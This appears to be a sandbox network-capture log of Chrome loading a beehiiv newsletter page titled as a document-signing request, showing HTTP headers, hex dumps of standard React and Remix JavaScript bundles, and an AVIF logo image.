                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:32 UTC914INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:32 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 64195
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"fac3-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4159
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8951dab80d3-EWR
                                                                                                                                            2025-01-15 18:14:32 UTC455INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 66 37 61 30 62 34 36 63 2d 63 36 65 32 2d 35 34 35 62 2d 61 31 65 35 2d 66 34 65 36 64 62 66 36 64 35 65 31 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="f7a0b46c-c6e2-545b-a1e5-f4e6dbf6d5e1")}catch(
                                                                                                                                            2025-01-15 18:14:32 UTC1369INData Raw: 6c 26 26 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 61 2c 6c 2e 67 65 74 3f 6c 3a 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 28 29 3d 3e 6e 5b 61 5d 7d 29 7d 7d 7d 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 28 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 53 79 6d 62 6f 6c 2e 74 6f 53 74 72 69 6e 67 54 61 67 2c 7b 76 61 6c 75 65 3a 22 4d 6f 64 75 6c 65 22 7d 29 29 7d 76 61 72 20 44 61 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 3c 22 75 22 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3c 22 75 22 3f 77 69 6e 64 6f 77 3a 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3c 22 75 22 3f 67 6c 6f 62 61 6c 3a 74 79 70 65 6f 66 20 73 65 6c 66 3c 22
                                                                                                                                            Data Ascii: l&&Object.defineProperty(e,a,l.get?l:{enumerable:!0,get:()=>n[a]})}}}return Object.freeze(Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}))}var Da=typeof globalThis<"u"?globalThis:typeof window<"u"?window:typeof global<"u"?global:typeof self<"
                                                                                                                                            2025-01-15 18:14:32 UTC1369INData Raw: 70 65 2e 69 73 52 65 61 63 74 43 6f 6d 70 6f 6e 65 6e 74 3d 7b 7d 3b 55 65 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 53 74 61 74 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 74 79 70 65 6f 66 20 65 21 3d 22 6f 62 6a 65 63 74 22 26 26 74 79 70 65 6f 66 20 65 21 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 65 21 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 74 61 6b 65 73 20 61 6e 20 6f 62 6a 65 63 74 20 6f 66 20 73 74 61 74 65 20 76 61 72 69 61 62 6c 65 73 20 74 6f 20 75 70 64 61 74 65 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 20 77 68 69 63 68 20 72 65 74 75 72 6e 73 20 61 6e 20 6f 62 6a 65 63 74 20 6f 66 20 73 74 61 74 65 20 76 61 72 69 61 62 6c 65 73 2e 22 29 3b 74 68 69 73 2e 75 70 64 61 74 65 72 2e 65 6e 71 75 65 75 65 53 65 74 53 74
                                                                                                                                            Data Ascii: pe.isReactComponent={};Ue.prototype.setState=function(e,t){if(typeof e!="object"&&typeof e!="function"&&e!=null)throw Error("takes an object of state variables to update or a function which returns an object of state variables.");this.updater.enqueueSetSt
                                                                                                                                            2025-01-15 18:14:32 UTC1369INData Raw: 29 7d 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 65 2e 73 74 61 74 75 73 3d 3d 3d 22 70 65 6e 64 69 6e 67 22 26 26 28 65 2e 73 74 61 74 75 73 3d 22 72 65 6a 65 63 74 65 64 22 2c 65 2e 72 65 61 73 6f 6e 3d 74 29 7d 29 29 2c 65 2e 73 74 61 74 75 73 29 7b 63 61 73 65 22 66 75 6c 66 69 6c 6c 65 64 22 3a 72 65 74 75 72 6e 20 65 2e 76 61 6c 75 65 3b 63 61 73 65 22 72 65 6a 65 63 74 65 64 22 3a 74 68 72 6f 77 20 65 2e 72 65 61 73 6f 6e 7d 7d 74 68 72 6f 77 20 65 7d 66 75 6e 63 74 69 6f 6e 20 6a 65 28 65 2c 74 2c 72 2c 6e 2c 61 29 7b 76 61 72 20 6c 3d 74 79 70 65 6f 66 20 65 3b 28 6c 3d 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 7c 7c 6c 3d 3d 3d 22 62 6f 6f 6c 65 61 6e 22 29 26 26 28 65 3d 6e 75 6c 6c 29 3b 76 61 72 20 6f 3d 21 31 3b 69 66 28 65 3d 3d 3d 6e 75 6c 6c 29
                                                                                                                                            Data Ascii: )},function(t){e.status==="pending"&&(e.status="rejected",e.reason=t)})),e.status){case"fulfilled":return e.value;case"rejected":throw e.reason}}throw e}function je(e,t,r,n,a){var l=typeof e;(l==="undefined"||l==="boolean")&&(e=null);var o=!1;if(e===null)
                                                                                                                                            2025-01-15 18:14:32 UTC1369INData Raw: 28 29 2c 74 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 72 29 7b 28 65 2e 5f 73 74 61 74 75 73 3d 3d 3d 30 7c 7c 65 2e 5f 73 74 61 74 75 73 3d 3d 3d 2d 31 29 26 26 28 65 2e 5f 73 74 61 74 75 73 3d 31 2c 65 2e 5f 72 65 73 75 6c 74 3d 72 29 7d 2c 66 75 6e 63 74 69 6f 6e 28 72 29 7b 28 65 2e 5f 73 74 61 74 75 73 3d 3d 3d 30 7c 7c 65 2e 5f 73 74 61 74 75 73 3d 3d 3d 2d 31 29 26 26 28 65 2e 5f 73 74 61 74 75 73 3d 32 2c 65 2e 5f 72 65 73 75 6c 74 3d 72 29 7d 29 2c 65 2e 5f 73 74 61 74 75 73 3d 3d 3d 2d 31 26 26 28 65 2e 5f 73 74 61 74 75 73 3d 30 2c 65 2e 5f 72 65 73 75 6c 74 3d 74 29 7d 69 66 28 65 2e 5f 73 74 61 74 75 73 3d 3d 3d 31 29 72 65 74 75 72 6e 20 65 2e 5f 72 65 73 75 6c 74 2e 64 65 66 61 75 6c 74 3b 74 68 72 6f 77 20 65 2e 5f 72 65 73 75 6c 74 7d
                                                                                                                                            Data Ascii: (),t.then(function(r){(e._status===0||e._status===-1)&&(e._status=1,e._result=r)},function(r){(e._status===0||e._status===-1)&&(e._status=2,e._result=r)}),e._status===-1&&(e._status=0,e._result=t)}if(e._status===1)return e._result.default;throw e._result}
                                                                                                                                            2025-01-15 18:14:32 UTC1369INData Raw: 6e 74 73 29 7d 7d 3b 4c 2e 63 6c 6f 6e 65 45 6c 65 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 69 66 28 65 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 54 68 65 20 61 72 67 75 6d 65 6e 74 20 6d 75 73 74 20 62 65 20 61 20 52 65 61 63 74 20 65 6c 65 6d 65 6e 74 2c 20 62 75 74 20 79 6f 75 20 70 61 73 73 65 64 20 22 2b 65 2b 22 2e 22 29 3b 76 61 72 20 6e 3d 67 72 28 7b 7d 2c 65 2e 70 72 6f 70 73 29 2c 61 3d 65 2e 6b 65 79 2c 6c 3d 76 6f 69 64 20 30 3b 69 66 28 74 21 3d 6e 75 6c 6c 29 66 6f 72 28 6f 20 69 6e 20 74 2e 72 65 66 21 3d 3d 76 6f 69 64 20 30 26 26 28 6c 3d 76 6f 69 64 20 30 29 2c 74 2e 6b 65 79 21 3d 3d 76 6f 69 64 20 30 26 26 28 61 3d 22 22 2b 74 2e 6b 65 79 29 2c 74 29 21 45 72 2e 63 61 6c 6c 28 74 2c 6f 29 7c 7c
                                                                                                                                            Data Ascii: nts)}};L.cloneElement=function(e,t,r){if(e==null)throw Error("The argument must be a React element, but you passed "+e+".");var n=gr({},e.props),a=e.key,l=void 0;if(t!=null)for(o in t.ref!==void 0&&(l=void 0),t.key!==void 0&&(a=""+t.key),t)!Er.call(t,o)||
                                                                                                                                            2025-01-15 18:14:32 UTC1369INData Raw: 2e 73 74 61 72 74 54 72 61 6e 73 69 74 69 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 46 2e 54 2c 72 3d 7b 7d 3b 46 2e 54 3d 72 3b 74 72 79 7b 76 61 72 20 6e 3d 65 28 29 2c 61 3d 46 2e 53 3b 61 21 3d 3d 6e 75 6c 6c 26 26 61 28 72 2c 6e 29 2c 74 79 70 65 6f 66 20 6e 3d 3d 22 6f 62 6a 65 63 74 22 26 26 6e 21 3d 3d 6e 75 6c 6c 26 26 74 79 70 65 6f 66 20 6e 2e 74 68 65 6e 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 6e 2e 74 68 65 6e 28 70 6e 2c 58 74 29 7d 63 61 74 63 68 28 6c 29 7b 58 74 28 6c 29 7d 66 69 6e 61 6c 6c 79 7b 46 2e 54 3d 74 7d 7d 3b 4c 2e 75 6e 73 74 61 62 6c 65 5f 75 73 65 43 61 63 68 65 52 65 66 72 65 73 68 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 46 2e 48 2e 75 73 65 43 61 63 68 65 52 65 66 72 65 73 68 28 29
                                                                                                                                            Data Ascii: .startTransition=function(e){var t=F.T,r={};F.T=r;try{var n=e(),a=F.S;a!==null&&a(r,n),typeof n=="object"&&n!==null&&typeof n.then=="function"&&n.then(pn,Xt)}catch(l){Xt(l)}finally{F.T=t}};L.unstable_useCacheRefresh=function(){return F.H.useCacheRefresh()
                                                                                                                                            2025-01-15 18:14:32 UTC1369INData Raw: 6c 6c 2c 64 65 66 61 75 6c 74 3a 6d 6e 7d 2c 5b 79 5d 29 3b 2f 2a 2a 0a 20 2a 20 40 72 65 6d 69 78 2d 72 75 6e 2f 72 6f 75 74 65 72 20 76 31 2e 31 36 2e 31 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 52 65 6d 69 78 20 53 6f 66 74 77 61 72 65 20 49 6e 63 2e 0a 20 2a 0a 20 2a 20 54 68 69 73 20 73 6f 75 72 63 65 20 63 6f 64 65 20 69 73 20 6c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 20 66 6f 75 6e 64 20 69 6e 20 74 68 65 0a 20 2a 20 4c 49 43 45 4e 53 45 2e 6d 64 20 66 69 6c 65 20 69 6e 20 74 68 65 20 72 6f 6f 74 20 64 69 72 65 63 74 6f 72 79 20 6f 66 20 74 68 69 73 20 73 6f 75 72 63 65 20 74 72 65 65 2e 0a 20 2a 0a 20 2a 20 40 6c 69 63 65 6e 73 65 20 4d 49 54 0a 20 2a 2f 66 75 6e 63 74 69 6f 6e
                                                                                                                                            Data Ascii: ll,default:mn},[y]);/** * @remix-run/router v1.16.1 * * Copyright (c) Remix Software Inc. * * This source code is licensed under the MIT license found in the * LICENSE.md file in the root directory of this source tree. * * @license MIT */function
                                                                                                                                            2025-01-15 18:14:32 UTC1369INData Raw: 2e 63 68 61 72 41 74 28 30 29 3d 3d 3d 22 3f 22 3f 72 3a 22 3f 22 2b 72 29 2c 6e 26 26 6e 21 3d 3d 22 23 22 26 26 28 74 2b 3d 6e 2e 63 68 61 72 41 74 28 30 29 3d 3d 3d 22 23 22 3f 6e 3a 22 23 22 2b 6e 29 2c 74 7d 66 75 6e 63 74 69 6f 6e 20 62 65 28 65 29 7b 6c 65 74 20 74 3d 7b 7d 3b 69 66 28 65 29 7b 6c 65 74 20 72 3d 65 2e 69 6e 64 65 78 4f 66 28 22 23 22 29 3b 72 3e 3d 30 26 26 28 74 2e 68 61 73 68 3d 65 2e 73 75 62 73 74 72 28 72 29 2c 65 3d 65 2e 73 75 62 73 74 72 28 30 2c 72 29 29 3b 6c 65 74 20 6e 3d 65 2e 69 6e 64 65 78 4f 66 28 22 3f 22 29 3b 6e 3e 3d 30 26 26 28 74 2e 73 65 61 72 63 68 3d 65 2e 73 75 62 73 74 72 28 6e 29 2c 65 3d 65 2e 73 75 62 73 74 72 28 30 2c 6e 29 29 2c 65 26 26 28 74 2e 70 61 74 68 6e 61 6d 65 3d 65 29 7d 72 65 74 75 72 6e
                                                                                                                                            Data Ascii: .charAt(0)==="?"?r:"?"+r),n&&n!=="#"&&(t+=n.charAt(0)==="#"?n:"#"+n),t}function be(e){let t={};if(e){let r=e.indexOf("#");r>=0&&(t.hash=e.substr(r),e=e.substr(0,r));let n=e.indexOf("?");n>=0&&(t.search=e.substr(n),e=e.substr(0,n)),e&&(t.pathname=e)}return
                                                                                                                                            2025-01-15 18:14:32 UTC1369INData Raw: 74 65 6e 65 72 22 29 3b 72 65 74 75 72 6e 20 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 51 74 2c 70 29 2c 75 3d 44 2c 28 29 3d 3e 7b 61 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 51 74 2c 70 29 2c 75 3d 6e 75 6c 6c 7d 7d 2c 63 72 65 61 74 65 48 72 65 66 28 44 29 7b 72 65 74 75 72 6e 20 74 28 61 2c 44 29 7d 2c 63 72 65 61 74 65 55 52 4c 3a 78 2c 65 6e 63 6f 64 65 4c 6f 63 61 74 69 6f 6e 28 44 29 7b 6c 65 74 20 4f 3d 78 28 44 29 3b 72 65 74 75 72 6e 7b 70 61 74 68 6e 61 6d 65 3a 4f 2e 70 61 74 68 6e 61 6d 65 2c 73 65 61 72 63 68 3a 4f 2e 73 65 61 72 63 68 2c 68 61 73 68 3a 4f 2e 68 61 73 68 7d 7d 2c 70 75 73 68 3a 76 2c 72 65 70 6c 61 63 65 3a 54 2c 67 6f 28 44 29 7b 72 65 74 75 72 6e 20 6f 2e 67 6f 28 44 29 7d 7d 3b 72 65
                                                                                                                                            Data Ascii: tener");return a.addEventListener(Qt,p),u=D,()=>{a.removeEventListener(Qt,p),u=null}},createHref(D){return t(a,D)},createURL:x,encodeLocation(D){let O=x(D);return{pathname:O.pathname,search:O.search,hash:O.hash}},push:v,replace:T,go(D){return o.go(D)}};re


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            5192.168.2.1649712104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:32 UTC846OUTGET /assets/jsx-runtime-BjG_zV1W.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:32 UTC912INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:32 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 1001
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"3e9-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4159
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8951aef4246-EWR
                                                                                                                                            2025-01-15 18:14:32 UTC457INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 63 33 35 38 66 63 65 34 2d 34 32 33 30 2d 35 38 31 65 2d 38 35 32 62 2d 37 30 62 38 36 39 61 39 39 36 62 66 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="c358fce4-4230-581e-852b-70b869a996bf")}catch(
                                                                                                                                            2025-01-15 18:14:32 UTC544INData Raw: 65 20 66 6f 75 6e 64 20 69 6e 20 74 68 65 0a 20 2a 20 4c 49 43 45 4e 53 45 20 66 69 6c 65 20 69 6e 20 74 68 65 20 72 6f 6f 74 20 64 69 72 65 63 74 6f 72 79 20 6f 66 20 74 68 69 73 20 73 6f 75 72 63 65 20 74 72 65 65 2e 0a 20 2a 2f 76 61 72 20 45 3d 53 79 6d 62 6f 6c 2e 66 6f 72 28 22 72 65 61 63 74 2e 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 65 6c 65 6d 65 6e 74 22 29 2c 6e 3d 53 79 6d 62 6f 6c 2e 66 6f 72 28 22 72 65 61 63 74 2e 66 72 61 67 6d 65 6e 74 22 29 3b 66 75 6e 63 74 69 6f 6e 20 6c 28 76 2c 72 2c 74 29 7b 76 61 72 20 65 3d 6e 75 6c 6c 3b 69 66 28 74 21 3d 3d 76 6f 69 64 20 30 26 26 28 65 3d 22 22 2b 74 29 2c 72 2e 6b 65 79 21 3d 3d 76 6f 69 64 20 30 26 26 28 65 3d 22 22 2b 72 2e 6b 65 79 29 2c 22 6b 65 79 22 69 6e 20 72 29 7b 74 3d 7b 7d 3b 66 6f
                                                                                                                                            Data Ascii: e found in the * LICENSE file in the root directory of this source tree. */var E=Symbol.for("react.transitional.element"),n=Symbol.for("react.fragment");function l(v,r,t){var e=null;if(t!==void 0&&(e=""+t),r.key!==void 0&&(e=""+r.key),"key"in r){t={};fo


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            6192.168.2.1649715104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:32 UTC868OUTGET /cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/static_assets/defaults/thumb_logo.png HTTP/1.1
                                                                                                                                            Host: media.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                            Sec-Fetch-Site: same-site
                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:32 UTC577INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:32 GMT
                                                                                                                                            Content-Type: image/avif
                                                                                                                                            Content-Length: 2841
                                                                                                                                            Connection: close
                                                                                                                                            CF-Ray: 9027d8951e4378d3-EWR
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            ETag: "cfj4p9oYe6TpWjrhZC3_iYLAuvQZp0weY8Ffr-CYcaDQ:2212cd9a9592977b37ab77c4fba45408"
                                                                                                                                            Last-Modified: Wed, 16 Nov 2022 19:51:18 GMT
                                                                                                                                            Vary: Accept
                                                                                                                                            cf-bgj: imgq:80,h2pri
                                                                                                                                            cf-resized: internal=ok/m q=0 n=60+98 c=0+0 v=2024.12.1 l=2841 f=false
                                                                                                                                            content-security-policy: default-src 'none'; navigate-to 'none'; form-action 'none'
                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                            Server: cloudflare
                                                                                                                                            2025-01-15 18:14:32 UTC792INData Raw: 00 00 00 18 66 74 79 70 61 76 69 66 00 00 00 00 6d 69 66 31 6d 69 61 66 00 00 00 d2 6d 65 74 61 00 00 00 00 00 00 00 21 68 64 6c 72 00 00 00 00 00 00 00 00 70 69 63 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0e 70 69 74 6d 00 00 00 00 00 01 00 00 00 1e 69 6c 6f 63 00 00 00 00 44 00 00 01 00 01 00 00 00 01 00 00 00 f2 00 00 0a 27 00 00 00 23 69 69 6e 66 00 00 00 00 00 01 00 00 00 15 69 6e 66 65 02 00 00 00 00 01 00 00 61 76 30 31 00 00 00 00 56 69 70 72 70 00 00 00 38 69 70 63 6f 00 00 00 14 69 73 70 65 00 00 00 00 00 00 03 20 00 00 03 20 00 00 00 0c 61 76 31 43 81 3f 40 00 00 00 00 10 70 69 78 69 00 00 00 00 03 0a 0a 0a 00 00 00 16 69 70 6d 61 00 00 00 00 00 00 00 01 00 01 03 01 82 03 00 00 0a 2f 6d 64 61 74 12 00 0a 0a 3f e6 71 fc 7c bc 04 34 1b
                                                                                                                                            Data Ascii: ftypavifmif1miafmeta!hdlrpictpitmilocD'#iinfinfeav01Viprp8ipcoispe av1C?@pixiipma/mdat?q|4
                                                                                                                                            2025-01-15 18:14:32 UTC1369INData Raw: 47 ea e8 00 63 92 29 b5 e5 4b bd 5d ca 01 aa eb ca be e8 1e 69 7f 21 96 02 cd 57 80 dc 97 1f 84 b6 44 a6 3d 80 26 03 ff fd b2 07 5a 56 b3 94 5c 39 aa 37 f2 1f ef 14 46 b2 7a 51 07 f0 a2 25 64 f0 a8 03 b4 39 b2 6d 65 86 26 03 7f 81 f3 07 6b 56 eb b8 67 d9 77 a2 2a c7 4e 52 f5 63 42 37 ce 68 40 58 46 5e c2 37 c6 4f c1 ca 1a 27 66 7a f8 9c 2d 38 5d ac 39 dd 5f ec 42 35 2b 1c 80 50 1d 82 4b b9 d5 d2 24 15 a3 d5 3a 99 9a 5d 51 28 a8 65 f7 0a 6c dd 8d 7d 41 99 97 26 f4 e3 c4 e6 31 9f 4f 01 32 6e 9b 1a b2 df ba a9 74 2c 7f d1 ee f5 91 c4 dd 41 b5 95 38 d0 bd 16 e9 d7 0b ce 49 bb fc f1 bc 96 77 61 b5 5e 61 6f a0 92 2a 40 3f b2 c6 b7 75 9f 7f ae 8e 22 f6 f8 ba 19 26 0d 7e 98 cf 8f 4e a2 b7 83 c9 ec 5a 2d 32 75 7e ba 6c 2d 57 d5 65 f6 83 2f cf da 7b 12 74 18 a5 c1
                                                                                                                                            Data Ascii: Gc)K]i!WD=&ZV\97FzQ%d9me&kVgw*NRcB7h@XF^7O'fz-8]9_B5+PK$:]Q(el}A&1O2nt,A8Iwa^ao*@?u"&~NZ-2u~l-We/{t
